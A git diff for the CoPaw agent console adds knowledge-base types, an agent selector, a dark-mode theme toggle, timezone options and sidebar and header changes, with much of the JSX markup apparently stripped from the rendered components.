+++ b/console/src/api/types/chat.ts
@@ -1,3 +1,5 @@
+export type ChatStatus = "idle" | "running";
+
 export interface ChatSpec {
   id: string; // Chat UUID identifier
   session_id: string; // Session identifier (channel:user_id format)
@@ -6,6 +8,7 @@
   created_at: string | null; // Chat creation timestamp (ISO 8601)
   updated_at: string | null; // Chat last update timestamp (ISO 8601)
   meta?: Record; // Additional metadata
+  status?: ChatStatus; // Conversation status: idle or running
 }
 
 export interface Message {
@@ -16,6 +19,7 @@
 
 export interface ChatHistory {
   messages: Message[];
+  status?: ChatStatus; // Conversation status: idle or running
 }
 
 export interface ChatDeleteResponse {
diff --git a/console/src/api/types/index.ts b/console/src/api/types/index.ts
index 91db60d3c..86ad7790c 100644
--- a/console/src/api/types/index.ts
+++ b/console/src/api/types/index.ts
@@ -1,6 +1,8 @@
 export * from "./agent";
+export * from "./agents";
 export * from "./channel";
 export * from "./heartbeat";
+export * from "./knowledge";
 export * from "./chat";
 export * from "./cronjob";
 export * from "./env";
diff --git a/console/src/api/types/knowledge.ts b/console/src/api/types/knowledge.ts
new file mode 100644
index 000000000..0c9a9ea06
--- /dev/null
+++ b/console/src/api/types/knowledge.ts
@@ -0,0 +1,155 @@
+export type KnowledgeSourceType =
+  | "file"
+  | "directory"
+  | "url"
+  | "text"
+  | "chat";
+
+export interface KnowledgeSourceSpec {
+  id: string;
+  name: string;
+  type: KnowledgeSourceType;
+  location: string;
+  content: string;
+  enabled: boolean;
+  recursive: boolean;
+  tags: string[];
+  summary: string;
+}
+
+export interface KnowledgeIndexConfig {
+  chunk_size: number;
+  chunk_overlap: number;
+  max_file_size: number;
+  include_globs: string[];
+  exclude_globs: string[];
+}
+
+export interface KnowledgeAutomationConfig {
+  knowledge_auto_collect_chat_files: boolean;
+  knowledge_auto_collect_chat_urls: boolean;
+  knowledge_auto_collect_long_text: boolean;
+  knowledge_long_text_min_chars: number;
+}
+
+export interface KnowledgeConfig {
+  version: number;
+  enabled: boolean;
+  sources: KnowledgeSourceSpec[];
+  index: KnowledgeIndexConfig;
+  automation: KnowledgeAutomationConfig;
+}
+
+export interface KnowledgeSourceStatus {
+  indexed: boolean;
+  indexed_at: string | null;
+  document_count: number;
+  chunk_count: number;
+  error: string | null;
+  remote_status?: string;
+  remote_cache_state?: string;
+  remote_fail_count?: number;
+  remote_next_retry_at?: string | null;
+  remote_last_error?: string | null;
+  remote_updated_at?: string | null;
+}
+
+export interface KnowledgeSourceItem extends KnowledgeSourceSpec {
+  subject?: string;
+  keywords?: string[];
+  status: KnowledgeSourceStatus;
+}
+
+export interface KnowledgeSourcesResponse {
+  enabled: boolean;
+  sources: KnowledgeSourceItem[];
+}
+
+export interface KnowledgeIndexResult {
+  source_id: string;
+  document_count: number;
+  chunk_count: number;
+  indexed_at: string;
+}
+
+export interface KnowledgeBulkIndexResult {
+  indexed_sources: number;
+  results: KnowledgeIndexResult[];
+}
+
+export interface KnowledgeSearchHit {
+  source_id: string;
+  source_name: string;
+  source_type: KnowledgeSourceType;
+  document_path: string;
+  document_title: string;
+  score: number;
+  snippet: string;
+}
+
+export interface KnowledgeSearchResponse {
+  query: string;
+  hits: KnowledgeSearchHit[];
+}
+
+export interface KnowledgeHistoryBackfillStatus {
+  has_backfill_record: boolean;
+  backfill_completed: boolean;
+  marked_unbackfilled: boolean;
+  history_chat_count: number;
+  has_pending_history: boolean;
+  progress?: KnowledgeHistoryBackfillProgress;
+}
+
+export interface KnowledgeHistoryBackfillProgress {
+  running: boolean;
+  completed: boolean;
+  failed: boolean;
+  total_sessions: number;
+  traversed_sessions: number;
+  processed_sessions: number;
+  current_session_id?: string | null;
+  error?: string | null;
+  updated_at?: string | null;
+  reason?: string | null;
+}
+
+export interface KnowledgeHistoryBackfillRunResponse {
+  result: {
+    changed: boolean;
+    skipped: boolean;
+    reason?: string;
+    processed_sessions?: number;
+    file_sources?: number;
+    url_sources?: number;
+    text_sources?: number;
+  };
+  status: KnowledgeHistoryBackfillStatus;
+}
+
+export interface KnowledgeSourceDocument {
+  path: string;
+  title: string;
+  text: string;
+}
+
+export interface KnowledgeSourceContent {
+  indexed: boolean;
+  indexed_at?: string | null;
+  document_count?: number;
+  chunk_count?: number;
+  documents: KnowledgeSourceDocument[];
+}
+
+export interface KnowledgeClearResponse {
+  cleared: boolean;
+  cleared_indexes: number;
+  cleared_sources: number;
+  removed_source_configs: boolean;
+}
+
+export interface KnowledgeRestoreResponse {
+  success: boolean;
+  replace_existing: boolean;
+  restored_sources: number;
+}
\ No newline at end of file
diff --git a/console/src/components/AgentSelector/index.module.less b/console/src/components/AgentSelector/index.module.less
new file mode 100644
index 000000000..e7ac55360
--- /dev/null
+++ b/console/src/components/AgentSelector/index.module.less
@@ -0,0 +1,397 @@
+// ─── Wrapper ──────────────────────────────────────────────────────────────────
+.agentSelectorWrapper {
+  display: flex;
+  align-items: center;
+  gap: 8px;
+  padding: 0;
+  background: transparent;
+  border: none;
+  transition: all 0.2s ease;
+}
+
+// ─── Label ────────────────────────────────────────────────────────────────────
+.agentSelectorLabel {
+  display: flex;
+  align-items: center;
+  gap: 6px;
+  font-size: 12px;
+  font-weight: 500;
+  color: rgba(0, 0, 0, 0.4);
+  white-space: nowrap;
+  user-select: none;
+
+  svg {
+    opacity: 0.5;
+  }
+}
+
+// ─── Select Component ─────────────────────────────────────────────────────────
+.agentSelector {
+  min-width: 180px;
+
+  :global {
+    .ant-select-selector {
+      border: 1px solid rgba(97, 92, 237, 0.25) !important;
+      background: rgba(97, 92, 237, 0.04) !important;
+      box-shadow: none !important;
+      padding: 4px 8px !important;
+      height: 32px !important;
+      font-size: 13px;
+      font-weight: 500;
+      border-radius: 8px !important;
+      transition: all 0.2s ease;
+
+      &:hover {
+        border-color: rgba(97, 92, 237, 0.45) !important;
+        background: rgba(97, 92, 237, 0.07) !important;
+      }
+
+      &:focus {
+        border-color: #615ced !important;
+        background: #ffffff !important;
+        box-shadow: 0 0 0 2px rgba(97, 92, 237, 0.12) !important;
+      }
+    }
+
+    .ant-select-selection-item {
+      padding: 0 !important;
+      line-height: 22px;
+    }
+
+    .ant-select-arrow {
+      color: rgba(97, 92, 237, 0.5);
+      right: 8px;
+
+      .ant-select-suffix {
+        display: flex;
+        align-items: center;
+      }
+    }
+
+    .ant-select-focused {
+      .ant-select-selector {
+        border-color: #615ced !important;
+        background: #ffffff !important;
+        box-shadow: 0 0 0 2px rgba(97, 92, 237, 0.12) !important;
+      }
+    }
+  }
+}
+
+// ─── Selected Agent Label ─────────────────────────────────────────────────────
+.selectedAgentLabel {
+  display: flex;
+  align-items: center;
+  gap: 6px;
+  color: rgba(0, 0, 0, 0.85);
+
+  svg {
+    flex-shrink: 0;
+    color: #615ced;
+    opacity: 0.85;
+  }
+
+  span {
+    font-weight: 600;
+    font-size: 13px;
+  }
+}
+
+// ─── Agent Badge ──────────────────────────────────────────────────────────────
+.agentSelectorSuffix {
+  display: flex;
+  align-items: center;
+  gap: 6px;
+  margin-right: 0;
+
+  .agentBadge {
+    :global {
+      .ant-badge-count {
+        background: linear-gradient(135deg, #615ced, #8b87f0);
+        color: #ffffff;
+        font-size: 10px;
+        font-weight: 700;
+        min-width: 18px;
+        height: 18px;
+        line-height: 18px;
+        border-radius: 9px;
+        box-shadow: 0 2px 6px rgba(97, 92, 237, 0.35);
+      }
+    }
+  }
+}
+
+// ─── Dropdown
───────────────────────────────────────────────────────────────── +.agentSelectorDropdown { + border-radius: 12px !important; + overflow: hidden; + min-width: 280px !important; + box-shadow: + 0 8px 32px rgba(0, 0, 0, 0.12), + 0 2px 8px rgba(0, 0, 0, 0.06) !important; + :global { + .copaw-select-item { + padding: 0 !important; + border-radius: 8px; + margin: 3px 6px; + transition: all 0.15s cubic-bezier(0.4, 0, 0.2, 1); + + &:hover { + background: rgba(97, 92, 237, 0.08) !important; + } + + &.copaw-select-item-option-selected { + background: rgba(97, 92, 237, 0.05) !important; + + .agentOptionIcon { + background: linear-gradient(135deg, #615ced 0%, #8b87f0 100%); + border-color: transparent; + color: #ffffff; + box-shadow: 0 2px 8px rgba(97, 92, 237, 0.4); + } + } + } + + .ant-select-item { + padding: 0 !important; + border-radius: 8px; + margin: 3px 6px; + transition: all 0.15s cubic-bezier(0.4, 0, 0.2, 1); + + &:hover { + background: rgba(97, 92, 237, 0.08) !important; + } + + &.ant-select-item-option-selected { + background: rgba(97, 92, 237, 0.05) !important; + + .agentOptionIcon { + background: linear-gradient(135deg, #615ced 0%, #8b87f0 100%); + border-color: transparent; + color: #ffffff; + box-shadow: 0 2px 8px rgba(97, 92, 237, 0.4); + } + } + } + + .rc-virtual-list { + padding: 6px 0; + } + } +} + +// ─── Agent Option ───────────────────────────────────────────────────────────── +.agentOption { + padding: 10px 14px; + display: flex; + flex-direction: column; + gap: 6px; +} + +.agentOptionHeader { + display: flex; + align-items: center; + gap: 10px; +} + +.agentOptionIcon { + flex-shrink: 0; + width: 30px; + height: 30px; + display: flex; + align-items: center; + justify-content: center; + background: linear-gradient(135deg, #f5f5ff 0%, #efefff 100%); + border: 1px solid rgba(97, 92, 237, 0.15); + border-radius: 8px; + color: #615ced; + transition: all 0.2s ease; + + .agentOption:hover & { + background: linear-gradient(135deg, #ebe9ff 0%, #f0efff 100%); + 
border-color: rgba(97, 92, 237, 0.3); + color: #615ced; + box-shadow: 0 2px 6px rgba(97, 92, 237, 0.15); + } +} + +.agentOptionContent { + flex: 1; + min-width: 0; + display: flex; + flex-direction: column; + gap: 2px; +} + +.agentOptionName { + display: flex; + align-items: center; + gap: 6px; + font-size: 13px; + font-weight: 600; + color: #1a1a2e; + line-height: 1.4; + + span { + flex: 1; + overflow: hidden; + text-overflow: ellipsis; + white-space: nowrap; + } +} + +.activeIndicator { + flex-shrink: 0; + color: #52c41a; + animation: fadeIn 0.3s ease; +} + +@keyframes fadeIn { + from { + opacity: 0; + transform: scale(0.8); + } + to { + opacity: 1; + transform: scale(1); + } +} + +.agentOptionDescription { + font-size: 11px; + color: #8c8c8c; + line-height: 1.4; + overflow: hidden; + text-overflow: ellipsis; + white-space: nowrap; +} + +.agentOptionId { + font-size: 10px; + font-family: "SF Mono", "Consolas", "Monaco", monospace; + color: rgba(97, 92, 237, 0.4); + letter-spacing: 0.3px; + padding-top: 4px; + border-top: 1px solid rgba(97, 92, 237, 0.06); +} + +// ─── Dark mode overrides ─────────────────────────────────────────────────────── +:global(.dark-mode) { + .agentSelectorLabel { + color: rgba(255, 255, 255, 0.55); + + svg { + opacity: 0.7; + } + } + + .agentSelector { + :global { + .ant-select-selector { + border-color: rgba(139, 135, 240, 0.3) !important; + background: rgba(97, 92, 237, 0.1) !important; + + &:hover { + border-color: rgba(139, 135, 240, 0.5) !important; + background: rgba(97, 92, 237, 0.15) !important; + } + + &:focus { + border-color: #8b87f0 !important; + background: rgba(97, 92, 237, 0.15) !important; + box-shadow: 0 0 0 2px rgba(97, 92, 237, 0.25) !important; + } + } + + .ant-select-arrow { + color: rgba(139, 135, 240, 0.6); + } + + .ant-select-focused .ant-select-selector { + border-color: #8b87f0 !important; + background: rgba(97, 92, 237, 0.15) !important; + box-shadow: 0 0 0 2px rgba(97, 92, 237, 0.25) !important; + } + } + } + 
+ .selectedAgentLabel { + color: rgba(255, 255, 255, 0.9); + + svg { + color: #b8b5f5; + opacity: 0.9; + } + } + + .agentSelectorSuffix { + .agentBadge { + :global { + .ant-badge-count { + background: linear-gradient(135deg, #615ced, #8b87f0); + color: #ffffff; + box-shadow: 0 2px 6px rgba(97, 92, 237, 0.4); + } + } + } + } + + .agentSelectorDropdown { + box-shadow: + 0 8px 32px rgba(0, 0, 0, 0.4), + 0 2px 8px rgba(0, 0, 0, 0.2) !important; + + :global { + .ant-select-item { + &:hover { + background: rgba(255, 255, 255, 0.1) !important; + } + + &.ant-select-item-option-selected { + background: rgba(255, 255, 255, 0.06) !important; + + .agentOptionIcon { + background: linear-gradient(135deg, #615ced 0%, #8b87f0 100%); + border-color: transparent; + color: #ffffff; + box-shadow: 0 2px 8px rgba(97, 92, 237, 0.5); + } + } + } + } + } + + .agentOptionIcon { + background: linear-gradient( + 135deg, + rgba(97, 92, 237, 0.15) 0%, + rgba(97, 92, 237, 0.08) 100% + ); + border-color: rgba(139, 135, 240, 0.2); + color: #b8b5f5; + + .agentOption:hover & { + background: linear-gradient( + 135deg, + rgba(97, 92, 237, 0.3) 0%, + rgba(97, 92, 237, 0.15) 100% + ); + border-color: rgba(139, 135, 240, 0.4); + color: #c5c3f8; + box-shadow: 0 2px 8px rgba(97, 92, 237, 0.3); + } + } + + .agentOptionName { + color: rgba(255, 255, 255, 0.88); + } + + .agentOptionDescription { + color: rgba(255, 255, 255, 0.4); + } + + .agentOptionId { + color: rgba(139, 135, 240, 0.45); + border-top-color: rgba(139, 135, 240, 0.1); + } +} diff --git a/console/src/components/AgentSelector/index.tsx b/console/src/components/AgentSelector/index.tsx new file mode 100644 index 000000000..1add988a0 --- /dev/null +++ b/console/src/components/AgentSelector/index.tsx @@ -0,0 +1,100 @@ +import { Select, message, Badge } from "antd"; +import { useEffect, useState } from "react"; +import { Bot, Layers, CheckCircle } from "lucide-react"; +import { useAgentStore } from "../../stores/agentStore"; +import { agentsApi } 
from "../../api/modules/agents"; +import { useTranslation } from "react-i18next"; +import styles from "./index.module.less"; + +export default function AgentSelector() { + const { t } = useTranslation(); + const { selectedAgent, agents, setSelectedAgent, setAgents } = + useAgentStore(); + const [loading, setLoading] = useState(false); + + useEffect(() => { + loadAgents(); + }, []); + + const loadAgents = async () => { + try { + setLoading(true); + const data = await agentsApi.listAgents(); + setAgents(data.agents); + } catch (error) { + console.error("Failed to load agents:", error); + message.error(t("agent.loadFailed")); + } finally { + setLoading(false); + } + }; + + const handleChange = (value: string) => { + setSelectedAgent(value); + message.success(t("agent.switchSuccess")); + }; + + const agentCount = agents.length; + + return ( +
+
+ + {t("agent.currentWorkspace")} +
+ +
+ ); +} diff --git a/console/src/components/ThemeToggleButton/index.module.less b/console/src/components/ThemeToggleButton/index.module.less new file mode 100644 index 000000000..4ff0a6b7e --- /dev/null +++ b/console/src/components/ThemeToggleButton/index.module.less @@ -0,0 +1,36 @@ +/* ---- Theme toggle button ---- */ +.toggleBtn { + display: inline-flex; + align-items: center; + justify-content: center; + height: 32px; + border: none; + border-radius: 8px; + background: transparent; + cursor: pointer; + transition: + background 0.15s ease, + color 0.15s ease; + color: #555; + padding: 0; + flex-shrink: 0; + + &:hover { + background: rgba(97, 92, 237, 0.08); + color: #615ced; + } +} + +.icon { + font-size: 16px; +} + +/* Dark mode overrides */ +:global(.dark-mode) .toggleBtn { + color: #ccc; + + &:hover { + background: rgba(255, 255, 255, 0.1); + color: #fff; + } +} diff --git a/console/src/components/ThemeToggleButton/index.tsx b/console/src/components/ThemeToggleButton/index.tsx new file mode 100644 index 000000000..532c1cf79 --- /dev/null +++ b/console/src/components/ThemeToggleButton/index.tsx @@ -0,0 +1,28 @@ +import { Tooltip, Button } from "antd"; +import { SunOutlined, MoonOutlined } from "@ant-design/icons"; +import { useTheme } from "../../contexts/ThemeContext"; +import { useTranslation } from "react-i18next"; +import styles from "./index.module.less"; + +/** + * ThemeToggleButton - toggles between light and dark theme. + * Displays a sun icon in dark mode and a moon icon in light mode. 
+ */ +export default function ThemeToggleButton() { + const { isDark, toggleTheme } = useTheme(); + const { t } = useTranslation(); + + return ( + + + + ); +} diff --git a/console/src/constants/timezone.ts b/console/src/constants/timezone.ts new file mode 100644 index 000000000..d88d5096f --- /dev/null +++ b/console/src/constants/timezone.ts @@ -0,0 +1,21 @@ +export const TIMEZONE_OPTIONS = [ + { value: "America/Los_Angeles", label: "America/Los_Angeles (UTC-8)" }, + { value: "America/Denver", label: "America/Denver (UTC-7)" }, + { value: "America/Chicago", label: "America/Chicago (UTC-6)" }, + { value: "America/New_York", label: "America/New_York (UTC-5)" }, + { value: "America/Toronto", label: "America/Toronto (UTC-5)" }, + { value: "UTC", label: "UTC" }, + { value: "Europe/London", label: "Europe/London (UTC+0)" }, + { value: "Europe/Paris", label: "Europe/Paris (UTC+1)" }, + { value: "Europe/Berlin", label: "Europe/Berlin (UTC+1)" }, + { value: "Europe/Moscow", label: "Europe/Moscow (UTC+3)" }, + { value: "Asia/Dubai", label: "Asia/Dubai (UTC+4)" }, + { value: "Asia/Shanghai", label: "Asia/Shanghai (UTC+8)" }, + { value: "Asia/Hong_Kong", label: "Asia/Hong_Kong (UTC+8)" }, + { value: "Asia/Singapore", label: "Asia/Singapore (UTC+8)" }, + { value: "Asia/Tokyo", label: "Asia/Tokyo (UTC+9)" }, + { value: "Asia/Seoul", label: "Asia/Seoul (UTC+9)" }, + { value: "Australia/Sydney", label: "Australia/Sydney (UTC+10)" }, + { value: "Australia/Melbourne", label: "Australia/Melbourne (UTC+10)" }, + { value: "Pacific/Auckland", label: "Pacific/Auckland (UTC+12)" }, +]; diff --git a/console/src/contexts/ThemeContext.tsx b/console/src/contexts/ThemeContext.tsx new file mode 100644 index 000000000..15e04568c --- /dev/null +++ b/console/src/contexts/ThemeContext.tsx @@ -0,0 +1,104 @@ +import { + createContext, + useContext, + useEffect, + useState, + useCallback, + type ReactNode, +} from "react"; + +export type ThemeMode = "light" | "dark" | "system"; +export type 
ResolvedTheme = "light" | "dark"; + +const STORAGE_KEY = "copaw-theme"; + +interface ThemeContextValue { + /** User selected preference: light / dark / system */ + themeMode: ThemeMode; + /** Resolved final theme after applying system preference */ + isDark: boolean; + setThemeMode: (mode: ThemeMode) => void; + /** Convenience toggle: light ↔ dark (skips system) */ + toggleTheme: () => void; +} + +const ThemeContext = createContext<ThemeContextValue>({ + themeMode: "light", + isDark: false, + setThemeMode: () => {}, + toggleTheme: () => {}, +}); + +function getInitialMode(): ThemeMode { + try { + const stored = localStorage.getItem(STORAGE_KEY); + if (stored === "light" || stored === "dark" || stored === "system") { + return stored; + } + } catch { + // ignore storage errors + } + return "system"; +} + +function resolveIsDark(mode: ThemeMode): boolean { + if (mode === "dark") return true; + if (mode === "light") return false; + // system + return window.matchMedia?.("(prefers-color-scheme: dark)").matches ?? 
false; +} + +export function ThemeProvider({ children }: { children: ReactNode }) { + const [themeMode, setThemeModeState] = useState(getInitialMode); + const [isDark, setIsDark] = useState(() => + resolveIsDark(getInitialMode()), + ); + + // Apply dark/light class to element for global CSS variable overrides + useEffect(() => { + const html = document.documentElement; + if (isDark) { + html.classList.add("dark-mode"); + } else { + html.classList.remove("dark-mode"); + } + }, [isDark]); + + // Listen to system theme changes when mode is "system" + useEffect(() => { + if (themeMode !== "system") return; + + const mq = window.matchMedia("(prefers-color-scheme: dark)"); + const handler = (e: MediaQueryListEvent) => { + setIsDark(e.matches); + }; + mq.addEventListener("change", handler); + return () => mq.removeEventListener("change", handler); + }, [themeMode]); + + const setThemeMode = useCallback((mode: ThemeMode) => { + setThemeModeState(mode); + setIsDark(resolveIsDark(mode)); + try { + localStorage.setItem(STORAGE_KEY, mode); + } catch { + // ignore + } + }, []); + + const toggleTheme = useCallback(() => { + setThemeMode(isDark ? 
"light" : "dark"); + }, [isDark, setThemeMode]); + + return ( + + {children} + + ); +} + +export function useTheme(): ThemeContextValue { + return useContext(ThemeContext); +} diff --git a/console/src/layouts/Header.tsx b/console/src/layouts/Header.tsx index 94975d310..c21622536 100644 --- a/console/src/layouts/Header.tsx +++ b/console/src/layouts/Header.tsx @@ -1,5 +1,7 @@ import { Layout, Space } from "antd"; import LanguageSwitcher from "../components/LanguageSwitcher"; +import ThemeToggleButton from "../components/ThemeToggleButton"; +import AgentSelector from "../components/AgentSelector"; import { useTranslation } from "react-i18next"; import { FileTextOutlined, @@ -12,13 +14,8 @@ import styles from "./index.module.less"; const { Header: AntHeader } = Layout; -// Navigation URLs -const NAV_URLS = { - docs: "https://copaw.agentscope.io/docs/intro", - faq: "https://copaw.agentscope.io/docs/faq", - changelog: "https://github.com/agentscope-ai/CoPaw/releases", - github: "https://github.com/agentscope-ai/CoPaw", -} as const; +// Constants +const GITHUB_URL = "https://github.com/agentscope-ai/CoPaw" as const; const keyToLabel: Record = { chat: "nav.chat", @@ -26,6 +23,7 @@ const keyToLabel: Record = { sessions: "nav.sessions", "cron-jobs": "nav.cronJobs", heartbeat: "nav.heartbeat", + knowledge: "nav.knowledge", skills: "nav.skills", tools: "nav.tools", mcp: "nav.mcp", @@ -35,24 +33,35 @@ const keyToLabel: Record = { environments: "nav.environments", security: "nav.security", "token-usage": "nav.tokenUsage", + agents: "nav.agents", }; +// URL helper functions +const getWebsiteLang = (lang: string): string => + lang.startsWith("zh") ? 
"zh" : "en"; + +const getDocsUrl = (lang: string): string => + `https://copaw.agentscope.io/docs/intro?lang=${getWebsiteLang(lang)}`; + +const getFaqUrl = (lang: string): string => + `https://copaw.agentscope.io/docs/faq?lang=${getWebsiteLang(lang)}`; + +const getReleaseNotesUrl = (lang: string): string => + `https://copaw.agentscope.io/release-notes?lang=${getWebsiteLang(lang)}`; + interface HeaderProps { selectedKey: string; } export default function Header({ selectedKey }: HeaderProps) { - const { t } = useTranslation(); + const { t, i18n } = useTranslation(); const handleNavClick = (url: string) => { if (url) { - // Check if running in pywebview environment const pywebview = (window as any).pywebview; - if (pywebview && pywebview.api) { - // Use pywebview API to open external link in system browser + if (pywebview?.api) { pywebview.api.open_external_link(url); } else { - // Normal browser environment window.open(url, "_blank"); } } @@ -64,11 +73,12 @@ export default function Header({ selectedKey }: HeaderProps) { {t(keyToLabel[selectedKey] || "nav.chat")} + @@ -77,7 +87,7 @@ export default function Header({ selectedKey }: HeaderProps) { @@ -86,7 +96,7 @@ export default function Header({ selectedKey }: HeaderProps) { @@ -95,12 +105,13 @@ export default function Header({ selectedKey }: HeaderProps) { + ); diff --git a/console/src/layouts/MainLayout/index.tsx b/console/src/layouts/MainLayout/index.tsx index d8f39a17d..e8224c882 100644 --- a/console/src/layouts/MainLayout/index.tsx +++ b/console/src/layouts/MainLayout/index.tsx @@ -1,6 +1,5 @@ import { Layout } from "antd"; -import { useEffect } from "react"; -import { Routes, Route, useLocation, useNavigate } from "react-router-dom"; +import { Routes, Route, useLocation, Navigate } from "react-router-dom"; import Sidebar from "../Sidebar"; import Header from "../Header"; import ConsoleCronBubble from "../../components/ConsoleCronBubble"; @@ -11,6 +10,7 @@ import SessionsPage from "../../pages/Control/Sessions"; 
import CronJobsPage from "../../pages/Control/CronJobs"; import HeartbeatPage from "../../pages/Control/Heartbeat"; import AgentConfigPage from "../../pages/Agent/Config"; +import KnowledgePage from "../../pages/Agent/Knowledge"; import SkillsPage from "../../pages/Agent/Skills"; import ToolsPage from "../../pages/Agent/Tools"; import WorkspacePage from "../../pages/Agent/Workspace"; @@ -19,6 +19,8 @@ import ModelsPage from "../../pages/Settings/Models"; import EnvironmentsPage from "../../pages/Settings/Environments"; import SecurityPage from "../../pages/Settings/Security"; import TokenUsagePage from "../../pages/Settings/TokenUsage"; +import VoiceTranscriptionPage from "../../pages/Settings/VoiceTranscription"; +import AgentsPage from "../../pages/Settings/Agents"; const { Content } = Layout; @@ -28,6 +30,7 @@ const pathToKey: Record = { "/sessions": "sessions", "/cron-jobs": "cron-jobs", "/heartbeat": "heartbeat", + "/knowledge": "knowledge", "/skills": "skills", "/tools": "tools", "/mcp": "mcp", @@ -38,20 +41,13 @@ const pathToKey: Record = { "/agent-config": "agent-config", "/security": "security", "/token-usage": "token-usage", + "/voice-transcription": "voice-transcription", }; export default function MainLayout() { const location = useLocation(); - const navigate = useNavigate(); const currentPath = location.pathname; const selectedKey = pathToKey[currentPath] || "chat"; - const isChatPage = currentPath === "/" || currentPath.startsWith("/chat"); - - useEffect(() => { - if (currentPath === "/") { - navigate("/chat", { replace: true }); - } - }, [currentPath, navigate]); return ( @@ -75,6 +71,7 @@ export default function MainLayout() { } /> } /> } /> + } /> } /> } /> } /> diff --git a/console/src/layouts/Sidebar.tsx b/console/src/layouts/Sidebar.tsx index 36252f9cc..41a7d3d72 100644 --- a/console/src/layouts/Sidebar.tsx +++ b/console/src/layouts/Sidebar.tsx @@ -22,6 +22,7 @@ import { UsersRound, CalendarClock, Activity, + Database, Sparkles, Briefcase, Cpu, 
@@ -36,9 +37,15 @@ import { Copy, Check, BarChart3, + Mic, + Bot, + LogOut, } from "lucide-react"; import api from "../api"; +import { clearAuthToken } from "../api/config"; +import { authApi } from "../api/modules/auth"; import styles from "./index.module.less"; +import { useTheme } from "../contexts/ThemeContext"; const { Sider } = Layout; @@ -57,15 +64,18 @@ const KEY_TO_PATH: Record = { sessions: "/sessions", "cron-jobs": "/cron-jobs", heartbeat: "/heartbeat", + knowledge: "/knowledge", skills: "/skills", tools: "/tools", mcp: "/mcp", workspace: "/workspace", + agents: "/agents", models: "/models", environments: "/environments", "agent-config": "/agent-config", security: "/security", "token-usage": "/token-usage", + "voice-transcription": "/voice-transcription", }; const UPDATE_MD: Record = { @@ -192,6 +202,7 @@ function CopyButton({ text }: { text: string }) { export default function Sidebar({ selectedKey }: SidebarProps) { const navigate = useNavigate(); const { t, i18n } = useTranslation(); + const { isDark } = useTheme(); const [collapsed, setCollapsed] = useState(false); const [openKeys, setOpenKeys] = useState(DEFAULT_OPEN_KEYS); const [version, setVersion] = useState(""); @@ -199,6 +210,14 @@ export default function Sidebar({ selectedKey }: SidebarProps) { const [allVersions, setAllVersions] = useState([]); const [updateModalOpen, setUpdateModalOpen] = useState(false); const [updateMarkdown, setUpdateMarkdown] = useState(""); + const [authEnabled, setAuthEnabled] = useState(false); + + useEffect(() => { + authApi + .getStatus() + .then((res) => setAuthEnabled(res.enabled)) + .catch(() => {}); + }, []); useEffect(() => { if (!collapsed) { @@ -218,9 +237,19 @@ export default function Sidebar({ selectedKey }: SidebarProps) { .then((res) => res.json()) .then((data) => { const releases = data?.releases ?? 
{}; - // Sort versions by upload_time (newest first) - const versionsWithTime = Object.entries(releases).map( - ([version, files]) => { + + // Filter out pre-release versions (alpha, beta, rc, dev, etc.) + const isStableVersion = (version: string) => { + // Pre-release indicators matched below: a, alpha, b, beta, rc, c, candidate, dev + const preReleasePattern = /(a|alpha|b|beta|rc|c|candidate|dev)\d*/i; + return !preReleasePattern.test(version); + }; + + // Sort versions by upload_time (newest first), only include stable versions + const versionsWithTime = Object.entries(releases) + .filter(([version]) => isStableVersion(version)) + .map(([version, files]) => { + const fileList = files as Array<{ upload_time_iso_8601?: string }>; // Get the latest upload time among all files for this version + const latestUpload = fileList @@ -229,16 +258,32 @@ .sort() .pop(); return { version, uploadTime: latestUpload || "" }; - }, - ); + }); versionsWithTime.sort( (a, b) => new Date(b.uploadTime).getTime() - new Date(a.uploadTime).getTime(), ); const versions = versionsWithTime.map((v) => v.version); const latest = versions[0] ?? data?.info?.version ?? 
""; - setAllVersions(versions); - setLatestVersion(latest); + + // Only show update notification if the latest version was released more than 1 hour ago + // This gives Docker images time to build and become available + const oneHourAgo = new Date(Date.now() - 60 * 60 * 1000); + const latestVersionReleaseTime = versionsWithTime.find( + (v) => v.version === latest, + )?.uploadTime; + + if ( + latestVersionReleaseTime && + new Date(latestVersionReleaseTime) <= oneHourAgo + ) { + setAllVersions(versions); + setLatestVersion(latest); + } else { + // If latest version is less than 1 hour old, don't show update notification + setAllVersions([]); + setLatestVersion(""); + } }) .catch(() => {}); }, []); @@ -322,6 +367,11 @@ export default function Sidebar({ selectedKey }: SidebarProps) { label: t("nav.workspace"), icon: , }, + { + key: "knowledge", + label: t("nav.knowledge"), + icon: , + }, { key: "skills", label: t("nav.skills"), icon: }, { key: "tools", label: t("nav.tools"), icon: }, { key: "mcp", label: t("nav.mcp"), icon: }, @@ -337,6 +387,7 @@ export default function Sidebar({ selectedKey }: SidebarProps) { label: t("nav.settings"), icon: , children: [ + { key: "agents", label: t("nav.agents"), icon: }, { key: "models", label: t("nav.models"), icon: }, { key: "environments", @@ -353,6 +404,11 @@ export default function Sidebar({ selectedKey }: SidebarProps) { label: t("nav.tokenUsage"), icon: , }, + { + key: "voice-transcription", + label: t("nav.voiceTranscription"), + icon: , + }, ], }, ]; @@ -362,12 +418,16 @@ export default function Sidebar({ selectedKey }: SidebarProps) { collapsed={collapsed} onCollapse={setCollapsed} width={275} - className={styles.sider} + className={`${styles.sider}${isDark ? ` ${styles.siderDark}` : ""}`} >
{!collapsed && (
- CoPaw + CoPaw {version && ( + {authEnabled && ( +
+ +
+ )} + setUpdateModalOpen(false)} @@ -423,12 +506,13 @@ export default function Sidebar({ selectedKey }: SidebarProps) { + + + + + {showBackfillNowButton ? ( + + ) : null} +
+
+ + + {unifiedBatchProgress.visible ? ( +
+ + {unifiedBatchProgress.label} + + +
+ ) : null} + + + + + +
+ {t("knowledge.search")} + {hits.length > 0 ? ( + + {t("knowledge.searchHitCount", { count: hits.length })} + + ) : null} +
+
+ + { + const value = event.target.value; + setSearchQuery(value); + if (!value.trim() && hits.length > 0) { + setHits([]); + } + }} + placeholder={t("knowledge.searchPlaceholder")} + onPressEnter={handleSearch} + /> + +
+ + +
+
+
+ {showSearchPanel ? ( +
+ {searching ? ( +
+ +
+ ) : hits.length === 0 ? ( +
{t("knowledge.searchEmpty")}
+ ) : ( +
+ + {hits.map((hit) => ( + +
+ + {hit.source_name} + {hit.source_type} + + + {t("knowledge.scoreLabel", { + score: Number(hit.score).toFixed(2), + })} + +
+ {hit.document_title} + + {hit.document_path} + + + {hit.snippet} + +
+ ))} +
+
+ )} +
+ ) : null} +
+ +
+ +
+ + {t("knowledge.noteStyle")} + + setNoteStyle(value as KnowledgeNoteStyle)} + className={styles.noteStyleSegment} + /> +
+
+ +
+ +
+
